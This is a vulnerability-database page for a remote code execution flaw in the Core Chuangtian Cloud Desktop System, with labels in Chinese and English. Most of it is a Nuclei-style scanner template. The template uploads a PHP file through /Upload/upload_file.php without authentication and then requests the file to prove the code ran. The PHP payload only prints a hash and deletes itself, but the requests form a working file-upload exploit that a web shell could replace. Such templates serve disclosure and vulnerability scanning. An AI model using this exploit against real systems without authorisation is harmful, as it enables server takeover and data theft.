core-chuangtian-cloud-rce: Core Chuangtian Cloud Desktop System - Remote Code Execution

日期: 2025-08-01 | 影响软件: Core Chuangtian Cloud Desktop System | POC: 已公开

漏洞描述

Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.

PoC代码[已公开]

id: core-chuangtian-cloud-rce

info:
  name: Core Chuangtian Cloud Desktop System - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: rce,fileupload,intrusive,cloud,chuangtian,vuln
variables:
  string: "core-chuangtian-cloud-rce"

http:
  - raw:
      - |
        POST /Upload/upload_file.php?l=test HTTP/1.1
        Host: {{Hostname}}
        Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv

        ------WebKitFormBoundaryfcKRltGv
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: image/avif

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        ------WebKitFormBoundaryfcKRltGv--
      - |
        GET /Upload/test/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'
# digest: 4b0a00483046022100d646580ef36f5235e9e22bebae5d4f1ff5e725364e7ee96404b4455165d8e67f022100fec4bb071d0d8e1064c38b53fd978154924cd75fc8d0e4d3c14dffaa9a8d5645:922c64590222798bb761d5b6d8e72950

相关漏洞推荐